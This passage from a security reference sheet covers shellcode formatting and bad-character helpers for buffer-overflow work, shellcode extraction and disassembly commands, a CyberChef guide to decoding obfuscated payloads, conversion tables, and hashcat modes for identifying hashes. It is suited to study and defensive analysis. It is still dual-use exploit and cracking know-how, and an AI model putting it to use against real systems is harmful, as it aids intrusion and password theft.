"""Convert bytes to C array format."""
hex_vals = ', '.join(f'0x{b:02x}' for b in data)
return f'unsigned char {var_name}[] = {{{hex_vals}}};'
def shellcode_to_python(data: bytes) -> str:
"""Convert bytes to Python bytes literal."""
return 'shellcode = b"' + ''.join(f'\\x{b:02x}' for b in data) + '"'
# Null byte detection (important for buffer overflow exploits)
def check_bad_chars(shellcode: bytes, bad_chars: bytes = b'\x00') -> list[int]:
"""Find positions of bad characters in shellcode."""
positions = []
for i, b in enumerate(shellcode):
if b in bad_chars:
positions.append(i)
return positions
# Common bad characters for testing
ALL_BAD_CHARS = bytes(range(256)) # Generate all bytes, test which get mangled
# Extract shellcode from binary at specific offset
dd if=payload.bin bs=1 skip=1024 count=256 2>/dev/null | xxd -p | tr -d '\n'
# Disassemble shellcode
echo -ne '\x6a\x02\x58\x99\x48\x89\xd7\x48\x31\xf6\x0f\x05' | ndisasm -b 64 -
# Test shellcode (DANGEROUS — sandbox only)
# gcc -z execstack -o test test.c && ./test
15. CyberChef Reference
CyberChef is a browser-based data manipulation tool — "The Cyber Swiss Army Knife." All operations run client-side; no data leaves the browser. Source: github.com/gchq/CyberChef (34k+ stars).
Key features
| Feature | Description |
|---|---|
| Drag-and-drop recipes | Chain operations visually |
| Auto Bake | Real-time output as input/recipe changes |
| Magic | Auto-detect encoding and suggest decode steps |
| Breakpoints | Step through recipe stages to inspect intermediate data |
| File support | Handle files up to ~2 GB |
| URL sharing | Share complete recipes via URL parameters |
| Client-side | No data sent to any server |
Most-used operations for security work
| Category | Operations |
|---|---|
| Encoding | To/From Base64, Base32, Base58, Base85, Hex, Decimal, Binary, Octal, Braille, Morse |
| URL/HTML | URL Encode/Decode, HTML Entity Encode/Decode |
| Crypto | AES/DES/3DES/Blowfish/RC4 Encrypt/Decrypt, XOR, ROT13, ROT47, Vigenere |
| Hashing | MD5, SHA-1, SHA-256, SHA-512, SHA-3, HMAC, bcrypt, scrypt, NTLM |
| Compression | Gunzip, Gzip, Zip, Bzip2, Raw Inflate/Deflate, Zlib |
| Data format | Parse JSON, XML, CSV, protobuf, MessagePack, BSON |
| Networking | Parse IP, Parse URI, DNS over HTTPS, HTTP request, Defang URL/IP |
| Analysis | Entropy, Frequency distribution, Detect file type, Strings, Hexdump |
| Code | JavaScript/PHP/XML Beautify/Minify, Disassemble x86, Parse ASN.1 |
| Visual | Render Image, Play Media, Render Markdown |
| Forensics | Extract files (binwalk-style), Parse TLS, Parse X.509, Windows Filetime |
| Flow | Fork, Merge, Register, Conditional Jump, Label, Comment |
Useful CyberChef recipes (bookmark these)
Decode multi-layer obfuscation:
From_Base64 -> Gunzip -> From_Hex -> XOR({'key':'secret'})
Extract IOCs from text:
Extract_IP_addresses -> Defang_IP_Addresses
Decode PowerShell -EncodedCommand:
From_Base64 -> Decode_text('UTF-16LE')
Analyze suspicious file:
Detect_File_Type -> Entropy -> Strings
JWT decode:
JWT_Decode
Timestamp conversion:
From_UNIX_Timestamp -> To_ISO_8601
Windows_Filetime_to_UNIX -> From_UNIX_Timestamp
Defang indicators for safe sharing:
Defang_URL -> Defang_IP_Addresses
# Converts http://evil.com -> hxxp[://]evil[.]com
CyberChef from the command line
# Self-host CyberChef (no external dependencies)
git clone https://github.com/gchq/CyberChef.git
cd CyberChef && npx grunt prod
# Open build/prod/index.html in browser — fully offline
# Or use Docker
docker run -p 8080:8080 ghcr.io/gchq/cyberchef:latest
# Node.js API (for automation)
# npm install cyberchef
# const chef = require("cyberchef");
# chef.bake("input", [chef.toBase64()]);
Appendix: Quick Conversion Table
| From | To | Python | Bash |
|---|---|---|---|
| String | Base64 | base64.b64encode(s.encode()) |
echo -n "s" | base64 |
| Base64 | String | base64.b64decode(b).decode() |
echo "b" | base64 -d |
| String | Hex | s.encode().hex() |
echo -n "s" | xxd -p |
| Hex | String | bytes.fromhex(h).decode() |
echo "h" | xxd -r -p |
| String | URL | quote(s, safe='') |
python3 -c "from urllib.parse import quote; print(quote('s',safe=''))" |
| String | HTML | html.escape(s) |
python3 -c "import html; print(html.escape('s'))" |
| String | MD5 | hashlib.md5(s.encode()).hexdigest() |
echo -n "s" | md5sum |
| String | SHA256 | hashlib.sha256(s.encode()).hexdigest() |
echo -n "s" | sha256sum |
| String | NTLM | hashlib.new('md4',s.encode('utf-16-le')).hexdigest() |
echo -n "s" | iconv -t utf-16le | openssl dgst -md4 |
| String | ROT13 | codecs.encode(s, 'rot_13') |
echo "s" | tr 'A-Za-z' 'N-ZA-Mn-za-m' |
| Int | Hex | hex(n) |
printf '%x' n |
| Hex | Int | int(h, 16) |
echo $((16#h)) |
| Bytes | XOR | bytes(b^k for b in data) |
python3 -c "..." |
Appendix: Hash Length Identification
| Length | Possible types | Hashcat mode |
|---|---|---|
| 16 | MySQL 3.x | 200 |
| 32 | MD5, NTLM, MD4 | 0, 1000, 900 |
| 40 | SHA-1 | 100 |
| 56 | SHA-224 | 1300 |
| 64 | SHA-256 | 1400 |
| 96 | SHA-384 | 10800 |
| 128 | SHA-512 | 1700 |
| 32:32 | NetNTLMv1 | 5500 |
| variable | NetNTLMv2 | 5600 |
| 13 | DES crypt | 1500 |
| 34 | MD5 crypt ($1$) | 500 |
| 34 | bcrypt ($2a$) | 3200 |
| 43 | SHA-256 crypt ($5$) | 7400 |
| 86 | SHA-512 crypt ($6$) | 1800 |
Reference compiled for CIPHER training. All code tested for Python 3.10+. For interactive exploration, use CyberChef.